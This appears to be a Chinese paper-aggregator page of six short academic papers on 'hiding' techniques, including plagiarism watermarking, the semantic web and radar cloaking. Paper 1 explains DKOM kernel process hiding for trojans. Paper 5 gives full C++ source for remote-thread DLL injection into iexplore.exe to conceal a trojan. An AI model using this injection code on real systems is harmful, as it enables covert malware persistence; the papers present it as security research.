欢迎来到易发表网,期刊咨询:400-808-1701 订阅咨询:400-808-1721

关于我们 期刊咨询 科普杂志

隐藏技术论文优选九篇

时间:2023-02-28 15:55:27

引言:易发表网凭借丰富的文秘实践,为您精心挑选了九篇隐藏技术论文范例。如需获取更多原创内容,可随时联系我们的客服老师。

隐藏技术论文

第1篇

关键词:进程隐藏 Windows server 2008 DKOM技术 WDM驱动编程

中图分类号:TP3 文献标识码:A 文章编号:1007-9416(2013)03-0110-02

1 引言

Windows Server 2008是专为强化新一代IPv6网络、应用程序和Web服务的功能而设计的服务器系统。该系统虽是建立在Windows Server先前版本的成功与优势上,但是也因此继承了Windows系列操作系统的一些可能被病毒所利用的传统特征,如进程隐藏机制。所谓进程隐藏就是在用户不知情的情况下悄悄执行自己的代码。恶意代码通常通过隐藏自身进程信息,在用户察觉不到的情况下植入破坏性代码或窃取用户保密信息。进程隐藏,一直是病毒、木马程序设计者不断探求的重要技术,因为这些进程都需要很好的隐藏和保护自身信息。

当前,伴随着Windows服务器系统功能的日益发展与完善,木马技术也紧跟发展,使得木马在系统中更具隐藏性,更具危害性。本文在此背景下研究进程隐藏机制,将有助于进一步了解和掌握木马技术的发展方向,有助于采取更有力的应对措施。了解进程隐藏技术,是开发防病毒和木马软件的基础,同时也助于促进信息安全技术的发展。

有些情况下,进程隐藏也是某些类型程序所需要的功能,如某些系统安全控制程序,例如网络流量监控系统,这种程序需要在服务器系统中长驻,不能随意停止和卸载,这则要求进程能有效保护和隐藏自己,以防止用户恶意删除和卸载。在当前企业中要求提供高度安全的网络基础架构,以提高和增加技术效率与价值的大趋势下,分析此背景下木马实现的关键技术,必将具有重要的的现实意义。

2 Windows系列操作系统中的进程隐藏技术

进程是程序运行的基础,因此检查进程也就成了查杀木马的关键环节,所以,对木马设计者而言,成功隐藏自己的进程信息,就是其最重要的基础工作。随着木马技术的不断发展,进隐藏技术也在不断发更新。

进程隐藏技术在不断的发展中,在Win NT架构服务器时代,第一代进程隐藏技术就已经出现。早在Windos 98系统当中,微软公司就提供了一种将进程注册为服务的方法,这种技术称为Pegister Service Process。

由于这种隐藏技术存在严重的版本限制性,从而引发了第二代进程隐藏技术的研究,称之为进程插入。利用的技术有DLL插入技术、远程线程插入技术等,这种隐藏技术较之第一代更为高级和隐藏。继进程插入技术之后,新的进程隐藏技术又飞速发展,称为HOOK API技术。Windows系统给开发人员提供了几种列出系统中所有的进程、模块与驱动程序的方法,最常见的也是最常用的方法就是调用系统API;Create Tool Help 32 Snapshot、Enum Process、Enum Process Modules等,它们是获取进程列表的第一层手段,调用这几个API函数,就可以得带系统当前运行进程的返回列表。

这几个API在接到请求后会调用ZW Query System Information,Zw Query Ststem Information,会调用Ki System Service切入内核进入ring0权限,然后自SSDT表(System Service Descriptor Table,系统服务分配表)中查得Nt Query System Information的地址,并调用其指向的实际代码,其运行原理是从系统的数据结构中取相应的数据,再返回给调用者。

在此过程中,在任何一个环节上进行拦截都可以实现隐藏进程的目的,在切入内核进入root0权限前进行HOOK,称为用户模式HOOK,而在之后进行HOOK则是内核模式HOOK,后者需要驱动才能实现。它比前几种技术更为成熟。这种技术使得木马不必将自己插入到其他进程中,即可实现自身信息的隐藏。

更为高级的技术是DKOM―直接内核对象修改技术,是由木马程序将自身的进程信息从Windows服务器系统用以记录进程信息的“进程链表”中删除,这样进程管理工具就无法从“进程链表”中获得木马的进程信息。Windows服务器系统枚举进程使用的是活动进程列表Ps Active process list,所有结点通过EPROCESS结构中的Active Process Links 双向指针链在一起。EPROCESS结构中有个双向链表LIST_ENTRY结构,这个结构有两个DWORD指针成员FLINK和BLINK,这两个指针分别指向当前进程的前一个和后一个进程。要隐藏某个进程,只需修改对应ERPOCESS的Active Process Links,将其从链表中摘除。只要把当前进程的前一个进程的BLINK指向当前进程后一个进程的FLINK,再把当前进程后一个进程的FLINK指向当前进程前一个进程的FLINK。由于系统执行线程调度使用的是其他的数据结构,因此这种修改不会影响进程运行。

3 对DKOM进程隐藏技术的模拟与验证

在研究的各种进程隐藏技术中,最有效的是DKOM(Direct Kernel Object Manipulation,DKOM 直接内核对象修改技术)。这种技术绕过了对象管理器,直接对内核对象进行操作,从而绕过了所有关于对象的访问检查,彻底实现了进程隐藏。由于这种技术直接操作内核对象,需要ring0的运行权限,所以必须通过WDM驱动开发来实现。

在实现过程中,作者首先配置了Windows Server 2008平台上的驱动开发环境;然后对验证程序进行了详细设计,明确每个模块需要实现的功能;最后针对不同的模块一一探寻实现机理,如在编码的过程中,反汇编了重要的内核函数Ps Get Current Process,并利用WinDBG等工具剖析了Windows内核中重要的数据结构,从而深入揭示了改函数返回当前进程结构EPROCESS的原因。

即使隐藏了进程信息,管理员通过查找驱动文件信息还是可能发现该进程。本研究在实现进程隐藏的基础上,进一步实现了驱动的隐藏,利用的原理也是直接内核修改,从加载的模块双向链表中摘除驱动信息。

4 结语

利用DKOM技术编码隐藏进程之后,利用Windows server 2008中的资源管理器、Process Explorer、EF Process Manager、Antiy Ports、Process Viewer、Proscan六种主流的进程查看工具分别进行查看,都没有查看到被隐藏的进程。研究结果表明,这种技术可以很好地实现隐藏。

研究进程隐藏技术对于信息安全领域有非常重要的作用,通过研究内核层面的进程隐藏机制可以保障主机多种安全,如限制内核模块的任意加载,防止黑客插入恶意模块传播病毒、留下后门、修改重要文件和销毁攻击痕迹,防止部分系统功能被非法终止等。研究进程隐藏机制可大大增强主机的安全性,使用户在使用工程中避免恶意代码的破坏。信息安全将是未来发展的一个重点,攻击和侦测都有一个向底层靠拢的趋势。未来病毒和反病毒底层化是一个逆转的事实,这些方面的研究可以在保护服务器内关键信息免遭黑客侵害、积极保护用户的数据的方面为研究人员提供宝贵的经验。

参考文献

[1]张新宇,卿斯汉,马恒太,张楠,孙淑华,蒋建春.特洛伊木马隐藏技术研究[J]. 通信学报. 2006(07).

[2]刘颖.Windows环境恶意代码检测技术研究[D].电子科技大学,2007.

第2篇

关键词:电子作业;抄袭检查;文档指纹;信息隐藏

中图分类号:TP311 文献标识码:A 文章编号:1009-3044(2012)36-8679-02

随着计算机应用的普及,高校正在逐步实现作业的电子化和网络化。这种作业形式的改革有效减少了教育资源的浪费,减轻了教师的工作任务,提高了学生获得作业批阅结果的效率,教与学得到了互动。应该说作业的电子化是高校教学改革的一种必然趋势,但随之而来的是电子作业抄袭现象严重。学生抄袭作业时,少则部分复制他人文档,调整文档顺序,内容稍做修改;多则大部分甚至全盘拷贝他人文档。学生对于电子作业的抄袭轻松快捷又不易被识别,这就成为作业改革受到严重困扰的主要因素。

在电子作业的反抄袭检查工作上,教师的手工操作既耗时又费力,尤以高校学生人数众多,涉及的教师面而变得局限性很大。那么,建立一种快速、准确、高校的电子作业反抄袭检查模型若能够有效遏制了学生间电子作业相互拷贝,具有十分现实的意义。目的在于能够极大地提高教学的质量和效率,并有力的促进高校的教育改革。在应用领域抄袭检测算法已成为当前研究的热点话题,尤其是在学术论文的剽窃比对上。而我们能够在平时的教学工作中有效地抵制电子作业的抄袭现象,既能真实反映教学效果又能提高学生自主学习的意识和能力。这不仅是对于教学工作的促进更是培养人教育人的有效途径。

1 抄袭检查技术

计算机技术的发展和网络普遍应用,在无意间方便了很多人进行文章抄袭。其实电子作业抄袭现象是国内外的大学广泛存在的现象,为了有力遏制学生的这种不诚信的行为,国外早在20世纪90年代就开始了相应研究。由于西方语系的特点英语是以空格作为单词间隔,因此英语的抄袭检查方法是通过比较关键词来判断相似性的,效率很高。而中文与外文间存在着巨大的差异性, 强调词法与句法,因此关键词比对较不适用于中文。

目前中文的抄袭检查方法主要有基于字符串的匹配、基于统计的中文分词、文档指纹、句子相似度等。

2 电子作业反抄袭检查的实现

该文主要采用两种方法以实现电子作业的反抄袭检查:数字指纹技术和信息隐藏技术。首先吸取了文数字指纹技术的优势并对于指纹技术的算法(Hash函数)做出改进提出一种基于局部词频的指纹算法。其次很多高校特有应用的实验实习电子作业,此时内容都较为相似,所以该文又增加了基于信息隐藏技术的作业反抄袭检查方法,以对于这类电子作业进行有效的比对。

2.1基于局部词频的指纹技术

文档数字指纹技术是依据生成的待比较的文档指纹,通过在样本库中做对比进行抄袭检测。当相匹配指纹数目超过一定值时,可认定存在抄袭行为。为使其具有推广力,一般会引入松弛因子以提高检测的准确性。指纹生成算法是文档数字指纹技术的关键,一般利用 Hash 函数对文档中的特征标记进行计算,获得整数值。一般需要计算函数。

在高校的电子作业中很多都仅是对作业的句子的长度或词语的先后次序作了调整,内容的变化是较小的,用这种方法就会过度精确,用于检查电子作业效率很低。所以该文对这种算法做出一定改进,提出一种基于词频统计的指纹技术。局部词频统计技术借助于向量空间模型来实现。这种向量空间模型是由句子为单位构成的,并对句子进行关键词提取,并对关键词重新排序构建,根据编码与词频共同获取句子的指纹。依据句子的指纹获取文本相似度,具体的算法描述

2.2信息隐藏技术

在高校学生作业有一些是比较特殊的,例如在机房中完成的实验实习类报告,这类作业的特点是内容大致是相同的。可以在作业的源头采用一些基于信息隐藏的嵌入水印算法。在对作业进行片段拷贝时就在源头嵌入水印,能有效的防止拷贝抄袭的现象发生。这样即使电子作业的内容完全相同也能有效的检查到。不能轻易被破坏。这类作业防抄袭检查的水印嵌入既要求字符格式改变不易被擦觉也要兼顾有较大的信息嵌入量,不需太多的字符就能嵌入进机房的机器号及上机完成作业的时间。

由于人眼的视细胞对颜色敏感度的理论指出人眼对绿色最敏感,其次是红色,而对于蓝色是最不敏感的。而计算机的颜色设置理论是数字化的,所以可以对于RGB()的值中低位的值做秘密信息嵌入。可以对R值和G值改变都改变最低的1位bit,而对B值最低的2位bit。这样就对每个电子文档的字符嵌入了4位bit的信息隐藏,并把这4位二进制作为嵌入信息隐藏1Byte的高4位。同时也可以利用字符下划线的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit来隐藏4位信息。这4位bit作为嵌入信息隐藏1Byte的低4位。

在实际操作中程序所嵌入的信息包括程序读取的机器号及上机时间与机房管理系统数据库配合能准确定位学生的学号、姓名、班级等。当学生完成自己的电子作业过程中点击保存、Word程序自动保存、关闭Word文档时都会触发这一嵌入秘密信息的相关程序的运行,可以在全文实现循环嵌入秘密信息的作用。该反抄袭程序是在打开作业文档时自动运行,能自主识别学生作业中具有抄袭嫌疑的片段,协助教师对学生的作业给出客观评价,有效的对这类作业的抄袭起到屏蔽的作用。

3 结束语

在以往的反抄袭检查中主要是通过文档间内容重叠程度或者相似程度来断定的,相关的检查技术也很多也较成熟。但往往面对的是海量数据或是长文档,并需要对文档字符做精确检查。而在教学过程中的电子作业无论在内容、篇幅和数量方面都有很大差别。

该文的创新点是结合了基于局部词频的指纹技术和嵌入水印的信息隐藏技术,提出了一处主要针对高校的作业特点的反抄袭检查的模型。较为全面的考虑到了这类作业不同于学术剽窃的相关问题,所建立的这种快速、准确、高效的电子作业反抄袭检查模型能够在一定程度上遏制学生间电子作业相互拷贝,具有十分现实的意义。

参考文献:

[1] 蒋波.一种基于三重DES和RSA的综合加密方案[J].微计算机信息,2007(18).

[2] 陈国良.并行算法实践[M].北京:高等教育出版社,2004.

[3] 秦玉平,冷强奎,王秀坤,等. 基于局部词频指纹的论文抄袭检测算法[J].计算机工程,2011(6).

[4] 付兵.基于信息隐藏技术的电子作业防抄袭研究[J].微计算机信息,2009(18).

第3篇

关键词:语义Web;RDF;学术资源;本体

中图分类号:TP391文献标识码:A文章编号:1009-3044(2012)09-1985-03

An RDF-based Integration Model of Academic Resources

YAO Jin-feng1, CHEN Lei2

(1.School of Computer Science and Engineering, Anhui University of Science and Technology, Huainan 232001, China; 2.Department of Computer and Information Engineering, Huainan Normal University, Huainan 232038, China)

Abstract: Resources like papers or thesises can be abstraced as knowledge base. After analysed, we find it is appropriate to describe the Web objects of the academic resources using the Resource Description Frame(RDF) statements, and also, we can create the academic ontology with OWL. This paper proposes a mechamism of the semantic query and logical inference, deploys a academic resource knowledge discovery system which has the characters of the Semantic Web, and it will faciliate the user query and the management.

Key words: semantic web; RDF; academic resources; ontology

1概述

对于高校的教师和学生而言,论文之类的学术资源是一种从事学习和科研的重要知识资源,对它们的搜索与发现也是教师和学生的知识获取的重要手段。为了帮助用户的搜索,各高校和一些相关机构都推出了一些论文查询机制(如万方、维普等),极大地方便了相关人群的使用。

论文资源的组织本质上属于知识管理工程。知识管理所关注的是在一个组织中获取、处理和维护知识。对于大型论文资源库而言,有效地进行知识管理,在机构内部实施先进科学的知识组织与维护方式,对外则提供高效、高质量的用户查询(咨询)服务则是相关机构创造新的价值和增强竞争力的有效保证。目前大多数可用信息只具有弱结构组织形式,从知识管理的角度来说,现有技术存在以下诸方面的局限[1]:

1)信息搜索。当今的互联网通常依靠基于关键词的搜索引擎,这使得搜索的结构总是“高匹配、低精度”,而且从搜索结果的形式来看,总是单一的网页,如果所需要的信息分布在不同的文档中,则用户必须给出多个查询来收集相关的页面,然后自己提取这些页面中的相关信息并组织成一个整体。

2)信息抽取。需要人工浏览搜索的文档,当前的信息组织形式还不能满足智能软件(Intelligent Agent)的要求。

3)信息维护。比如术语的不相容性和无法移除过时的信息等。

4)信息挖掘。虽然可以用数据挖掘(Data Mining)等手段提取隐藏在信息数据库中的新知识,但对于分布式的、弱结构化的文档集合,这个任务仍然是困难的。

5)信息视图。经常需要限制某些用户对某些信息的浏览权限。“视图”意味着隐藏某些信息,在传统数据库中很容易做到这一点,但对于论文资源服务网站来说尚难以实现。

基于本体的论文资源语义网的研究的主要目的就是解决上述问题,并借助于自动推理机从给定的知识演绎出一些结论,从而使隐含的知识外显出来,并以期通过相应的(Agent)收集和整理信息,为用户提供备选方案。

2语义Web技术基础

语义Web研究的重点就是如何把信息表示为计算机能够理解和处理的形式,即带有语义。它主要基于XML和RDF/RDFS[2],并在此之上构建本体和逻辑推理规则,它完全基于语义的知识表示和推理,从而能够为计算机所理解和处理。

语义网的核心是本体。R.Studer给本体的定义是“一个本体是一个概念体系(Conceptualization)的显式的形式化规范”[3]。一个典型的本体由有限个术语以及它们之间的关系组成。术语(Term)指给定论域中的重要概念(如对象和类)。例如,以论文资源为例,标题、关键字、主题、作者等,都是术语。本体中概念之间的关系通常包括类的层次结构。除了子类关系外,本体还可以包括以下信息:属性、值约束、不相交描述和对象间逻辑关系的规定等。语义网通过网络本体语言来定义本体,以本体清晰明确地表达各种词汇集和网络上的不同数据资源间的语义关系,从而在网络上实现不同词汇集和数据资源间的共享以及基于网络的语义查询和推理。因此,在Web中,本体提供了对给定领域的一种共识,这种共识对于消除术语差别是必要的。本体尤其可以用于提高网络搜索的精确度,这是因为搜索引擎可以精确地根据本体中的概念查找相关页面,而不是收集所有出现某些关键词的页面,这样就保证了查询的结果。另外,可以利用本体在网络搜索中试探更一般或更特殊的查询。如果一个查询失败了,没有找到相关文档,看见过引擎可以向用户推荐更一般的查询。甚至可以考虑让搜索引擎主动执行这样的查询。

W3C推荐标准是RDF(Resource Description Framework)[2]。它实际上是一个数据模型(Data-Model)。它由一系列陈述(Statement)即“对象-属性-值”三元组,由此,RDF的数据模型可以很方便地描述对象以及它们的关系。实际上,RDF只提供二元谓词(属性)。由于任何复杂的关系都可以分解为多个二元关系,因此RDF的数据模型可以作为其他任何复杂关系模型的基础模型。通过RDF,可以将基于关键词的检索更容易地推进到基于语义的检索。

语义网的基本技术主要包括表示语言(本体开发)、查询语言、转换和推理技术以及相关工具等。其中本体的开发是整个语义网的构建基础,它包括以下一些阶段:确定范围、考虑复用、列举术语、定义分类、定义属性、定义侧面、定义实例和检查异常等。可以充分利用已有的本体或元数据,如都柏林核心元数据(Dublin Core metadata terms)[4]是广为使用的用于资源描述与发现的标准,在利用RDF描述资源时,可以使用其中的一些概念,都柏林核心元数据中典型的概念包括:Title、Creator、Subject等。

从现有知识源(如文本、词典、遗留知识库或本体、数据库模式等)获取领域知识、以(半)自动方式构造或改编本体即所谓的本体学习(ontology learning),是开发本体的有效途径。由河海大学许卓明教授等提出的“从ER模式到OWL DL本体的语义保持的翻译”较好的实现了这一问题,从而使用户可以方便地将ER模式翻译成OWL DL本体[5]。

逻辑推理是语义网的重要内容,根据RDF和RDF Schema建模原语,它所使用的形式语言是谓词逻辑(predicate logic),这通常被认为是所有(基于符号的)知识表示的基础。用逻辑描述RDF和RDFS的语义排除了二义性,并且是机器可读的,同时也为借助逻辑推理机制支持RDF/RDFS的自动推理提供了基础。但是,对于RDF和RDFS而言,它们可以表示某些本体知识,主要建模原主涉及以及类型层次组织起来的词汇,包括子类关系和子属关系、定义域和值域限定以及类实例,然而,还是有很多特性不支持,如属性的局部辖域、类的不相交性、类的布尔组合、基数约束和属性的特殊性质等。为此,在OWL中增加了一些原语以提供更强的表达能力,从而确保OWL的一些子语言(如OWL DL)对应于一个已经得到充分研究的描述逻辑系统。

3基于RDF的学术资源整合模型研究

在对论文资源库进行特点分析后可以发现,论文资源库属于知识库,传统的论文资源基本上有着良好、统一的格式且有着较好的隐藏数据开发潜力,可以在传统数据格式的基础上容易地用XML根据用户自定义的词汇表编写结构化网络文档,再利用RDF编写关于网络对象(论文资源)的简单陈述句,利用OWL语言创作论文资源本体,给出相应的查询和逻辑推理机制,最终将开发出具有新一代网络特征的论文资源语义网络,极大地方便了用户的查询和组织者的管理。

主要任务包括:

1)本体的产生

语义网上存在着各种本体,包括领域本体和全局本体。为了在进行信息检索时有一个较为统一的模式,以便进行语义推理和检索,要求定义全局本体的概念。可以从下几个方面进行定义。

①领域本体:领域本体又称为全局总体,它是对领域知识的明确清晰的表达,通常用本体语言来进行表述。在一些特定的实际应用中,领域本体及领域本体的合成是很有必要的。

②子领域本体:假定领域D能被分成n个子领域,那么领域D的领域本体也可以被分割成n个子领域本体。由于语义网上不同的领域本体通常用各种不同的本体语言来表述,在进行语义网信息检索的时候需要将这些用不同本体语言表述的领域本体转换成统一的形式。转换过程中不可避免地会出现一些信息的丢失,因此,在进行转换的同时,对来自同一个领域的领域本体进行一定的事例,得到新的领域本体。经过转换后的本体就变成了全局本体,也就是用统一的形式表达的各种领域知识集,它能够用更为精确和统一的方式来表达世界的知识集。领域本体转换成全局本体的过程可以通过本体转换工具半自动化地完成。

2)语义推理

推理是指从RDF文档的显式(explicit)知识出发,得到文档中没有显式描述的隐藏(implicit)的知识。在OWL-DL所依赖的描述逻辑中,推理主要分为概念之间的包含推理(subsumption relationship inferences)和实例与类之间的实例推理(instance relationship inferences),可以利用这两种推理在论文资源文档中发现传统搜索搜索不到的隐含信息。在RDFS的推理中,需要在前向链、反向链以及混合方式之间进行选择。前向链将所有数据都交给推理引擎,产生新数据后加入到数据集中;而反向链采用逻辑编程技术,当数据模型接受查询时,将查询翻译成目标,引擎利用反向链规则通过匹配三元组进行目标归结。而混合方式则根据实际情况进行 不同的推理选择。

3)信息检索

与传统的基于SQL的检索方式不同,用户提交的检索形式是语义检索,它有两个目的,一是将用户从具体苛刻的检索关键词中解放出来,用户只需要了解一组与领域词汇相关的本体词条就可以构建成查询语句;第二是可以通过推理查询查询到更加完备的结果。SPARQL[6]查询语言是W3C的推荐标准,它以子图匹配的方式在一组RDF数据集中进行匹配查询。

系统的框架如图1所示。在图1中,用户向系统提交语义查询,系统在已有的语义资源库中进行语义匹配,最终生成查询结果。仍然可以对查询结果进行语义相关性排序,限于篇幅,该文不对此进行研究。

学术资源库主要通过对传统的资源库进行语义转化而得到,这种转换可以是实例的转化,也可以是建立在传统资源库上的虚拟RDF视图[7]。

图1系统结构图

4总结

该文提出一种基于语义Web相关技术的学术资源整合平台模型,它以RDF、OWL本体形式组织学术资源,为用户提供语义查询的结构,通过OWL-DL的内部推理机制,满足用户的推理查询要求,是对传统的查询系统的一种极大的改进。

参考文献:

第4篇

这个电路板不光外形不像衣服,作用也和我们概念中的隐身衣大相径庭。

事实上,它是一个伪装装置。将它布置在需要隐藏的物体周围,就可以抵消外界信号的检测,从而实现物体隐形或变形。它的工作原理,不是隐身衣研究领域常用的反射或吸收电磁波,而是用一种特殊的导电材料,通过设定参数、控制电流走向改变被隐藏物体的电磁特性,骗过雷达之类的探测设备——但是,它骗不过人的眼睛。

不论是可见光还是无线电波,在本质上都是电磁波,差别在于它们的频率和波长不同。雷达的工作原理是通过天线把电磁波射向空间某一方向,当电磁波碰到处在此方向上的物体时,就被反射回来,雷达接收到这些电磁波后,对其进行详细分析,便可知道该物体的具体信息,比如材质、形状、高度、距离等。

兰州大学的这个电路板干的就是发出错误的信息误导此类探测器的事儿,通过一些特殊的参数设置,让雷达把一辆坦克当成其他东西,比如一堆土或者一棵树!如果再在外形上做一些伪装,骗过人的眼睛,那它在军事上的用处就非常了得了。

一些国家已经研发出用于侦查人员或者特种兵隐藏的反红外侦察隐形衣。这种衣服的颜色和花纹会随着周围环境的变化而变化,就像变色龙一样,同时,还能躲过敌人的红外侦察器材监测。

从根本原理上说,它们都和隐形飞机一样。

隐形飞机的设计原理就是通过形状和材料的变化,躲过雷达的侦察。它们身上涂有特殊的材料,可以吸收、消解、干涉雷达射出的电磁波,使其收不到反射电磁波。

最早提出这一设计理念的人是苏联科学家彼得·乌菲莫切夫。他在1964年发表的论文《物理衍射理论中的边缘波行为》中提出,物体对雷达电磁波的反射强度和它的大小无关,而和边缘布局有关,并描述了飞机表面和边缘的雷达反射面的计算办法。但由于其他相关学科发展水平落后,他的设想一直停留在理论层面。

20世纪70年代初,美国洛克希德公司的科学家发现了乌菲莫切夫的论文,以他的研究为基础,开始了著名的隐形飞机F-117的研发。1977年,F-117首飞,于1983年10月开始服役,在后来的海湾战争和南联盟战争中大展神威。

第5篇

摘要进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库方法,较好地解决了这一问题,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

第6篇

【 关键词 】 信息隐藏;DES;载密

【 中图分类号 】 TN915.08 【 文献标识码 】 A

【 Abstract 】 This paper presents a kind of information hiding technology, first of all, through using DES encryption algorithm to encrypt files, and then through information hiding, encrypted file hidden in the BMP image, the encryption image is exactly the same with the original image, the protection of the data is implemented very well.

【 Keywords 】 information hiding; des; encryption image

1 引言

